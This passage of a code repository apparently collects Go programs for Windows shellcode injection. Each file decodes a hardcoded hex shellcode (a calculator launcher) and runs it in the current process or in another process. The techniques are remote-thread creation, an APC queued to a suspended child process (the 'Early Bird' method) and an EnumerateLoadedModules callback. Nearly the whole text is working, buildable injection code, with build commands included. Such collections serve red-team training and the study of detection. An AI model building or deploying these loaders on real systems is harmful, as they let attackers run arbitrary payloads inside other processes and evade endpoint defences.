:= windows.CloseHandle(pHandle) 115 | if errCloseHandle != nil { 116 | log.Fatal(fmt.Sprintf("[!]Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 117 | } 118 | if *verbose { 119 | fmt.Println(fmt.Sprintf("[-]Successfully closed the handle to PID %d", *pid)) 120 | } 121 | 122 | } 123 | 124 | // export GOOS=windows GOARCH=amd64;go build -o goCreateRemoteThread.exe cmd/CreateRemoteThread/main.go 125 | -------------------------------------------------------------------------------- /cmd/CreateRemoteThreadNative/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in a remote process using the following steps 5 | 1. Get a handle to the target process 6 | 1. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 7 | 2. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 8 | 3. Change the memory page permissions to Execute/Read with VirtualProtectEx 9 | 4. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 10 | 5. Close the handle to the remote process 11 | 12 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 13 | */ 14 | 15 | package main 16 | 17 | import ( 18 | "encoding/hex" 19 | "flag" 20 | "fmt" 21 | "log" 22 | "os" 23 | "unsafe" 24 | 25 | // Sub Repositories 26 | "golang.org/x/sys/windows" 27 | ) 28 | 29 | func main() { 30 | verbose := flag.Bool("verbose", false, "Enable verbose output") 31 | debug := flag.Bool("debug", false, "Enable debug output") 32 | // To hardcode the Process Identifier (PID), change 0 to the PID of the target process 33 | pid := flag.Int("pid", 0, "Process ID to inject shellcode into") 34 | flag.Usage = func() { 35 | flag.PrintDefaults() 36 | os.Exit(0) 37 | } 38 | flag.Parse() 39 | 40 | // Pop Calc Shellcode 41 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 42 | if errShellcode != nil { 43 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 44 | } 45 | 46 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 47 | 48 | OpenProcess := kernel32.NewProc("OpenProcess") 49 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 50 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 51 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 52 | CreateRemoteThreadEx := kernel32.NewProc("CreateRemoteThreadEx") 53 | CloseHandle := kernel32.NewProc("CloseHandle") 54 | 55 | if *debug { 56 | fmt.Println(fmt.Sprintf("[DEBUG]Getting a handle to Process ID (PID) %d...", *pid)) 57 | } 58 | pHandle, _, errOpenProcess := OpenProcess.Call(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, 0, uintptr(uint32(*pid))) 59 | 60 | if errOpenProcess != nil && errOpenProcess.Error() != "The operation completed successfully." { 61 | log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errOpenProcess.Error())) 62 | } 63 | if *verbose { 64 | fmt.Println(fmt.Sprintf("[-]Successfully got a handle to process %d", *pid)) 65 | } 66 | 67 | if *debug { 68 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", *pid)) 69 | } 70 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 71 | 72 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 73 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 74 | } 75 | 76 | if addr == 0 { 77 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 78 | } 79 | if *verbose { 80 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", *pid)) 81 | } 82 | 83 | if *debug { 84 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", *pid)) 85 | } 86 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(pHandle), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 87 | 88 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 89 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 90 | } 91 | if *verbose { 92 | fmt.Println(fmt.Sprintf("[-]Successfully wrote shellcode to PID %d", *pid)) 93 | } 94 | 95 | if *debug { 96 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", *pid)) 97 | } 98 | oldProtect := windows.PAGE_READWRITE 99 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(pHandle), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 100 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 101 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 102 | } 103 | if *verbose { 104 | fmt.Println(fmt.Sprintf("[-]Successfully change memory permissions to PAGE_EXECUTE_READ in PID %d", *pid)) 105 | } 106 | 107 | if *debug { 108 | fmt.Println(fmt.Sprintf("[DEBUG]Call CreateRemoteThreadEx on PID %d...", *pid)) 109 | } 110 | _, _, errCreateRemoteThreadEx := CreateRemoteThreadEx.Call(uintptr(pHandle), 0, 0, addr, 0, 0, 0) 111 | if errCreateRemoteThreadEx != nil && errCreateRemoteThreadEx.Error() != "The operation completed successfully." { 112 | log.Fatal(fmt.Sprintf("[!]Error calling CreateRemoteThreadEx:\r\n%s", errCreateRemoteThreadEx.Error())) 113 | } 114 | if *verbose { 115 | fmt.Println(fmt.Sprintf("[+]Successfully create a remote thread in PID %d", *pid)) 116 | } 117 | 118 | if *debug { 119 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CloseHandle on PID %d...", *pid)) 120 | } 121 | _, _, errCloseHandle := CloseHandle.Call(uintptr(uint32(pHandle))) 122 | if errCloseHandle != nil && errCloseHandle.Error() != "The operation completed successfully." { 123 | log.Fatal(fmt.Sprintf("[!]Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 124 | } 125 | if *verbose { 126 | fmt.Println(fmt.Sprintf("[-]Successfully closed the handle to PID %d", *pid)) 127 | } 128 | 129 | } 130 | 131 | // export GOOS=windows GOARCH=amd64;go build -o goCreateRemoteThreadNative.exe cmd/CreateRemoteThreadNative/main.go 132 | -------------------------------------------------------------------------------- /cmd/CreateThread/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 6 | 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 7 | 3. Change the memory page permissions to Execute/Read with VirtualProtect 8 | 4. Call CreateThread on shellcode address 9 | 5. Call WaitForSingleObject so the program does not end before the shellcode is executed 10 | 11 | This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them 12 | */ 13 | 14 | package main 15 | 16 | import ( 17 | "encoding/hex" 18 | "flag" 19 | "fmt" 20 | "log" 21 | "unsafe" 22 | 23 | // Sub Repositories 24 | "golang.org/x/sys/windows" 25 | ) 26 | 27 | func main() { 28 | verbose := flag.Bool("verbose", false, "Enable verbose output") 29 | debug := flag.Bool("debug", false, "Enable debug output") 30 | flag.Parse() 31 | 32 | // Pop Calc Shellcode 33 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 34 | if errShellcode != nil { 35 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 36 | } 37 | 38 | if *debug { 39 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode") 40 | } 41 | addr, errVirtualAlloc := windows.VirtualAlloc(uintptr(0), uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 42 | 43 | if errVirtualAlloc != nil { 44 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 45 | } 46 | 47 | if addr == 0 { 48 | log.Fatal("[!]VirtualAlloc failed and returned 0") 49 | } 50 | 51 | if *verbose { 52 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 53 | } 54 | 55 | if *debug { 56 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory") 57 | } 58 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 59 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 60 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 61 | 62 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 63 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 64 | } 65 | 66 | if *verbose { 67 | fmt.Println("[-]Shellcode copied to memory") 68 | } 69 | 70 | if *debug { 71 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ") 72 | } 73 | var oldProtect uint32 74 | errVirtualProtect := windows.VirtualProtect(addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, &oldProtect) 75 | if errVirtualProtect != nil { 76 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 77 | } 78 | if *verbose { 79 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 80 | } 81 | 82 | if *debug { 83 | fmt.Println("[DEBUG]Calling CreateThread...") 84 | } 85 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 86 | CreateThread := kernel32.NewProc("CreateThread") 87 | thread, _, errCreateThread := CreateThread.Call(0, 0, addr, uintptr(0), 0, 0) 88 | 89 | if errCreateThread != nil && errCreateThread.Error() != "The operation completed successfully." { 90 | log.Fatal(fmt.Sprintf("[!]Error calling CreateThread:\r\n%s", errCreateThread.Error())) 91 | } 92 | if *verbose { 93 | fmt.Println("[+]Shellcode Executed") 94 | } 95 | 96 | if *debug { 97 | fmt.Println("[DEBUG]Calling WaitForSingleObject...") 98 | } 99 | 100 | event, errWaitForSingleObject := windows.WaitForSingleObject(windows.Handle(thread), 0xFFFFFFFF) 101 | if errWaitForSingleObject != nil { 102 | log.Fatal(fmt.Sprintf("[!]Error calling WaitForSingleObject:\r\n:%s", errWaitForSingleObject.Error())) 103 | } 104 | if *verbose { 105 | fmt.Println(fmt.Sprintf("[-]WaitForSingleObject returned with %d", event)) 106 | } 107 | } 108 | 109 | // export GOOS=windows GOARCH=amd64;go build -o goCreateThread.exe cmd/CreateThread/main.go 110 | -------------------------------------------------------------------------------- /cmd/CreateThreadNative/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 6 | 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 7 | 3. Change the memory page permissions to Execute/Read with VirtualProtect 8 | 4. Call CreateThread on shellcode address 9 | 5. Call WaitForSingleObject so the program does not end before the shellcode is executed 10 | 11 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 12 | */ 13 | 14 | package main 15 | 16 | import ( 17 | "encoding/hex" 18 | "flag" 19 | "fmt" 20 | "log" 21 | "unsafe" 22 | 23 | // Sub Repositories 24 | "golang.org/x/sys/windows" 25 | ) 26 | 27 | const ( 28 | // MEM_COMMIT is a Windows constant used with Windows API calls 29 | MEM_COMMIT = 0x1000 30 | // MEM_RESERVE is a Windows constant used with Windows API calls 31 | MEM_RESERVE = 0x2000 32 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 33 | PAGE_EXECUTE_READ = 0x20 34 | // PAGE_READWRITE is a Windows constant used with Windows API calls 35 | PAGE_READWRITE = 0x04 36 | ) 37 | 38 | func main() { 39 | verbose := flag.Bool("verbose", false, "Enable verbose output") 40 | debug := flag.Bool("debug", false, "Enable debug output") 41 | flag.Parse() 42 | 43 | // Pop Calc Shellcode 44 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 45 | if errShellcode != nil { 46 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 47 | } 48 | 49 | if *debug { 50 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll") 51 | } 52 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 53 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 54 | 55 | if *debug { 56 | fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect and RtlCopyMemory procedures") 57 | } 58 | VirtualAlloc := kernel32.NewProc("VirtualAlloc") 59 | VirtualProtect := kernel32.NewProc("VirtualProtect") 60 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 61 | CreateThread := kernel32.NewProc("CreateThread") 62 | WaitForSingleObject := kernel32.NewProc("WaitForSingleObject") 63 | 64 | if *debug { 65 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode") 66 | } 67 | addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 68 | 69 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 70 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 71 | } 72 | 73 | if addr == 0 { 74 | log.Fatal("[!]VirtualAlloc failed and returned 0") 75 | } 76 | 77 | if *verbose { 78 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 79 | } 80 | 81 | if *debug { 82 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory") 83 | } 84 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 85 | 86 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 87 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 88 | } 89 | if *verbose { 90 | fmt.Println("[-]Shellcode copied to memory") 91 | } 92 | 93 | if *debug { 94 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ") 95 | } 96 | 97 | oldProtect := PAGE_READWRITE 98 | _, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 99 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 100 | log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 101 | } 102 | if *verbose { 103 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 104 | } 105 | 106 | if *debug { 107 | fmt.Println("[DEBUG]Calling CreateThread...") 108 | } 109 | //var lpThreadId uint32 110 | thread, _, errCreateThread := CreateThread.Call(0, 0, addr, uintptr(0), 0, 0) 111 | 112 | if errCreateThread != nil && errCreateThread.Error() != "The operation completed successfully." { 113 | log.Fatal(fmt.Sprintf("[!]Error calling CreateThread:\r\n%s", errCreateThread.Error())) 114 | } 115 | if *verbose { 116 | fmt.Println("[+]Shellcode Executed") 117 | } 118 | 119 | if *debug { 120 | fmt.Println("[DEBUG]Calling WaitForSingleObject...") 121 | } 122 | 123 | _, _, errWaitForSingleObject := WaitForSingleObject.Call(thread, 0xFFFFFFFF) 124 | if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." { 125 | log.Fatal(fmt.Sprintf("[!]Error calling WaitForSingleObject:\r\n:%s", errWaitForSingleObject.Error())) 126 | } 127 | } 128 | 129 | // export GOOS=windows GOARCH=amd64;go build -o goCreateThreadNative.exe cmd/CreateThreadNative/main.go 130 | -------------------------------------------------------------------------------- /cmd/EarlyBird/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | // Concept pulled from https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ 4 | 5 | /* 6 | This program executes shellcode in a child process using the following steps: 7 | 1. Create a child proccess in a suspended state with CreateProcessW 8 | 2. Allocate RW memory in the child process with VirtualAllocEx 9 | 3. Write shellcode to the child process with WriteProcessMemory 10 | 4. Change the memory permissions to RX with VirtualProtectEx 11 | 5. Add a UserAPC call that executes the shellcode to the child process with QueueUserAPC 12 | 6. Resume the suspended program with ResumeThread function 13 | */ 14 | 15 | package main 16 | 17 | import ( 18 | "encoding/hex" 19 | "flag" 20 | "fmt" 21 | "log" 22 | "os" 23 | "syscall" 24 | "unsafe" 25 | 26 | // Sub Repositories 27 | "golang.org/x/sys/windows" 28 | ) 29 | 30 | func main() { 31 | verbose := flag.Bool("verbose", false, "Enable verbose output") 32 | debug := flag.Bool("debug", false, "Enable debug output") 33 | program := flag.String("program", "C:\\Windows\\System32\\notepad.exe", "The program to start and inject shellcode into") 34 | args := flag.String("args", "", "Program command line arguments") 35 | flag.Usage = func() { 36 | flag.PrintDefaults() 37 | os.Exit(0) 38 | } 39 | flag.Parse() 40 | 41 | // Pop Calc Shellcode (x64) 42 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 43 | if errShellcode != nil { 44 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 45 | } 46 | 47 | if *debug { 48 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll...") 49 | } 50 | 51 | // Load DLLs and Procedures 52 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 53 | 54 | if *debug { 55 | fmt.Println("[DEBUG]Loading supporting procedures...") 56 | } 57 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 58 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 59 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 60 | QueueUserAPC := kernel32.NewProc("QueueUserAPC") 61 | 62 | // Create child proccess in suspended state 63 | /* 64 | BOOL CreateProcessW( 65 | LPCWSTR lpApplicationName, 66 | LPWSTR lpCommandLine, 67 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 68 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 69 | BOOL bInheritHandles, 70 | DWORD dwCreationFlags, 71 | LPVOID lpEnvironment, 72 | LPCWSTR lpCurrentDirectory, 73 | LPSTARTUPINFOW lpStartupInfo, 74 | LPPROCESS_INFORMATION lpProcessInformation 75 | ); 76 | */ 77 | 78 | if *debug { 79 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreateProcess to start:\r\n\t%s %s...", *program, *args)) 80 | } 81 | procInfo := &windows.ProcessInformation{} 82 | startupInfo := &windows.StartupInfo{ 83 | Flags: windows.STARTF_USESTDHANDLES | windows.CREATE_SUSPENDED, 84 | ShowWindow: 1, 85 | } 86 | errCreateProcess := windows.CreateProcess(syscall.StringToUTF16Ptr(*program), syscall.StringToUTF16Ptr(*args), nil, nil, true, windows.CREATE_SUSPENDED, nil, nil, startupInfo, procInfo) 87 | if errCreateProcess != nil && errCreateProcess.Error() != "The operation completed successfully." { 88 | log.Fatal(fmt.Sprintf("[!]Error calling CreateProcess:\r\n%s", errCreateProcess.Error())) 89 | } 90 | if *verbose { 91 | fmt.Println(fmt.Sprintf("[-]Successfully created the %s process in PID %d", *program, procInfo.ProcessId)) 92 | } 93 | 94 | // Allocate memory in child process 95 | if *debug { 96 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", procInfo.ProcessId)) 97 | } 98 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(procInfo.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 99 | 100 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 101 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 102 | } 103 | 104 | if addr == 0 { 105 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 106 | } 107 | if *verbose { 108 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", procInfo.ProcessId)) 109 | } 110 | if *debug { 111 | fmt.Println(fmt.Sprintf("[DEBUG]Shellcode address: 0x%x", addr)) 112 | } 113 | 114 | // Write shellcode into child process memory 115 | if *debug { 116 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", procInfo.ProcessId)) 117 | } 118 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(procInfo.Process), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 119 | 120 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 121 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 122 | } 123 | if *verbose { 124 | fmt.Println(fmt.Sprintf("[-]Successfully wrote %d shellcode bytes to PID %d", len(shellcode), procInfo.ProcessId)) 125 | } 126 | 127 | // Change memory permissions to RX in child process where shellcode was written 128 | if *debug { 129 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", procInfo.ProcessId)) 130 | } 131 | oldProtect := windows.PAGE_READWRITE 132 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(procInfo.Process), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 133 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 134 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 135 | } 136 | if *verbose { 137 | fmt.Println(fmt.Sprintf("[-]Successfully changed memory permissions to PAGE_EXECUTE_READ in PID %d", procInfo.ProcessId)) 138 | } 139 | 140 | // QueueUserAPC 141 | if *debug { 142 | fmt.Println("[DEBUG]Calling QueueUserAPC") 143 | } 144 | 145 | ret, _, err := QueueUserAPC.Call(addr, uintptr(procInfo.Thread), 0) 146 | if err != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 147 | log.Fatal(fmt.Sprintf("[!]Error calling QueueUserAPC:\n%s", err.Error())) 148 | } 149 | if *debug { 150 | fmt.Printf("[DEBUG]The QueueUserAPC call returned %v\n", ret) 151 | } 152 | if *verbose { 153 | fmt.Printf("[-]Successfully queued a UserAPC on process ID %d\n", procInfo.ProcessId) 154 | } 155 | 156 | // Resume the child process 157 | if *debug { 158 | fmt.Println("[DEBUG]Calling ResumeThread...") 159 | } 160 | _, errResumeThread := windows.ResumeThread(procInfo.Thread) 161 | if errResumeThread != nil { 162 | log.Fatal(fmt.Sprintf("[!]Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 163 | } 164 | if *verbose { 165 | fmt.Println("[+]Process resumed and shellcode executed") 166 | } 167 | 168 | // Close the handle to the child process 169 | if *debug { 170 | fmt.Println("[DEBUG]Calling CloseHandle on child process...") 171 | } 172 | errCloseProcHandle := windows.CloseHandle(procInfo.Process) 173 | if errCloseProcHandle != nil { 174 | log.Fatal(fmt.Sprintf("[!]Error closing the child process handle:\r\n\t%s", errCloseProcHandle.Error())) 175 | } 176 | 177 | // Close the hand to the child process thread 178 | if *debug { 179 | fmt.Println("[DEBUG]Calling CloseHandle on child process thread...") 180 | } 181 | errCloseThreadHandle := windows.CloseHandle(procInfo.Thread) 182 | if errCloseThreadHandle != nil { 183 | log.Fatal(fmt.Sprintf("[!]Error closing the child process thread handle:\r\n\t%s", errCloseThreadHandle.Error())) 184 | } 185 | } 186 | 187 | // export GOOS=windows GOARCH=amd64;go build -o goEarlyBird.exe cmd/EarlyBird/main.go 188 | -------------------------------------------------------------------------------- /cmd/EnumerateLoadedModules/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | // This technique is semi-unreliable because the shellcode is sometimes executed multiple times 4 | 5 | package main 6 | 7 | import ( 8 | // Standard 9 | 10 | "encoding/hex" 11 | "flag" 12 | "fmt" 13 | "log" 14 | "syscall" 15 | "unsafe" 16 | 17 | // Sub Repositories 18 | "golang.org/x/sys/windows" 19 | ) 20 | 21 | func main() { 22 | verbose := flag.Bool("verbose", false, "Enable verbose output") 23 | debug := flag.Bool("debug", false, "Enable debug output") 24 | flag.Parse() 25 | 26 | // Pop Calc Shellcode 27 | shellcode, err := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 28 | if err != nil { 29 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", err)) 30 | } 31 | 32 | if *debug { 33 | fmt.Println("[DEBUG]Calling VirtualAlloc with PAGE_READWRITE...") 34 | } 35 | addr, errVirtualAlloc := windows.VirtualAlloc(uintptr(0), uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 36 | 37 | if errVirtualAlloc != nil { 38 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 39 | } 40 | 41 | if addr == 0 { 42 | log.Fatal("[!]VirtualAlloc failed and returned 0") 43 | } 44 | 45 | if *verbose { 46 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 47 | } 48 | 49 | if *debug { 50 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory...") 51 | } 52 | 53 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 54 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 55 | 56 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 57 | 58 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 59 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 60 | } 61 | 62 | if *verbose { 63 | fmt.Println("[-]Shellcode copied to memory") 64 | } 65 | 66 | if *debug { 67 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ...") 68 | } 69 | var oldProtect uint32 70 | errVirtualProtect := windows.VirtualProtect(addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, &oldProtect) 71 | if errVirtualProtect != nil { 72 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 73 | } 74 | if *verbose { 75 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 76 | } 77 | 78 | if *debug { 79 | fmt.Println("[DEBUG]Calling GetCurrentProcess...") 80 | } 81 | kernel32 := windows.NewLazySystemDLL("kernel32") 82 | GetCurrentProcess := kernel32.NewProc("GetCurrentProcess") 83 | // HANDLE GetCurrentProcess(); 84 | // https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess 85 | handle, _, err := GetCurrentProcess.Call() 86 | if err != syscall.Errno(0) { 87 | log.Fatal(fmt.Sprintf("[!]Error calling GetCurrentProcess:\r\n%s", err)) 88 | } 89 | 90 | if *debug { 91 | fmt.Println("[DEBUG]Calling EnumerateLoadedModules...") 92 | } 93 | 94 | dbghelp := windows.NewLazySystemDLL("Dbghelp") 95 | enumerateLoadedModules := dbghelp.NewProc("EnumerateLoadedModules") 96 | // BOOL IMAGEAPI EnumerateLoadedModules( 97 | // HANDLE hProcess, 98 | // PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, 99 | // PVOID UserContext 100 | // ); 101 | // https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules 102 | _, _, err = enumerateLoadedModules.Call(handle, addr, 0) 103 | if err != syscall.Errno(0) { 104 | log.Fatal(fmt.Sprintf("[!]Error calling EnumerateLoadedModules:\r\n%s", err)) 105 | } 106 | 107 | if *verbose { 108 | fmt.Println("[+]Shellcode executed") 109 | } 110 | } 111 | 112 | // BOOL PenumloadedModulesCallback( 113 | // PCSTR ModuleName, 114 | // ULONG ModuleBase, 115 | // ULONG ModuleSize, 116 | // PVOID UserContext 117 | // ) 118 | 119 | type PENUMLOADED_MODULES_CALLBACK 